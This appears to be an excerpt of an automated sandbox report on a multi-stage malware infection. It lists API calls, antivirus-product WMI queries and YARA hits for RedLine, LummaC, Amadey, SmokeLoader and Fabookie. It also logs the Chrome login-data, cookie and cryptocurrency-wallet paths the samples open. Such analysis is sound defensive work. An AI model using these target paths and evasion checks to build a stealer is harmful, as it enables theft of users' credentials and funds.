Code function: 6_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

6_2_00419F90

Source: explorer.exe, 00000003.00000000.548123054.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000003.00000000.558335978.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.551941805.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.548123054.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.548123054.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.547957038.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanath
Source: explorer.exe, 00000003.00000000.548123054.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	6_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	6_2_00438178
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_00440116
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	6_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	6_2_00438423
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	6_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: EnumSystemLocalesW,	6_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: GetLocaleInfoW,	6_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	6_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	6_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: EnumSystemLocalesW,	6_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	6_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	6_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	6_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	6_2_00437F83
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	6_2_00432FAD

Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\FE5F.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_00427756 cpuid

6_2_00427756

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 5_2_004093C5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_004093C5

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

6_2_0042FE47

Source: C:\Users\user\AppData\Local\Temp\E640.exe

6_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\E640.exe

6_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\325D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\325D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\325D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\325D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\325D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\325D.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Source: 325D.exe, 00000011.00000002.802882315.00000000025BB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 17.2.325D.exe.4320ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.325D.exe.25d0e28.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.325D.exe.25d0e28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4171e76.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4172d5e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.3e30e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4320ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4172d5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4171e76.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.325D.exe.3eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4320000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4320000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.657205781.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.803593297.0000000003E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.658454549.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.859320186.0000000004131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.877619417.0000000004320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.801800101.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 325D.exe PID: 6864, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 23.2.FE5F.exe.420fd90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.oneetx.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.oneetx.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.oldplayer.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.oneetx.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.oneetx.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.oldplayer.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.FE5F.exe.420fd90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.FE5F.exe.41a1d50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000000.678422871.00000000009B1000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.670255361.0000000000961000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.674614244.00000000009B1000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.680104542.00000000009B1000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.801672555.00000000009B1000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.675341132.0000000000961000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.687087896.0000000004165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\oldplayer.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 21.3.96DF.exe.3e20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.96DF.exe.3e10e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.96DF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.678970915.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.572121634.0000000002480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.637979878.0000000003F81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.636377602.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.679075530.0000000003E81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.662382966.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000001D.00000002.802176864.0000000001526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: oneetx.exe PID: 5148, type: MEMORYSTR

Yara detected Fabookie

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000001A.00000003.702112797.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.714108073.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.708507923.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.721198751.0000000000E59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.790895899.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.725519264.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.760176887.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.734810552.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.778651264.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.732320393.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.692248111.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.706466156.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.733256278.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.718588900.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.774340866.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.704153746.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.702521442.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.742156938.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.783994033.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.793329329.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aafg31.exe PID: 5060, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 325D.exe, 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: 325D.exe, 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 325D.exe, 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q-cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: 325D.exe, 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 325D.exe, 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: 325D.exe, 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 325D.exe, 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: 325D.exe, 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\f6f6d26e957fdb6a96caaf1481890445
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\325D.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\325D.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\325D.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\325D.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Source: Yara match	File source: 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 325D.exe PID: 6864, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 17.2.325D.exe.4320ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.325D.exe.25d0e28.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.325D.exe.25d0e28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4171e76.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4172d5e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.3e30e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4320ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4172d5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4171e76.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.325D.exe.3eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4320000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.325D.exe.4320000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.657205781.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.803593297.0000000003E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.658454549.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.859320186.0000000004131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.877619417.0000000004320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.801800101.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 325D.exe PID: 6864, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 21.3.96DF.exe.3e20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.96DF.exe.3e10e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.96DF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.678970915.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.572121634.0000000002480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.637979878.0000000003F81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.636377602.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.679075530.0000000003E81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.662382966.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Fabookie

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000001A.00000003.702112797.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.714108073.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.708507923.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.721198751.0000000000E59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.790895899.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.725519264.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.760176887.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.734810552.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.778651264.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.732320393.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.692248111.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.706466156.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.733256278.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.718588900.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
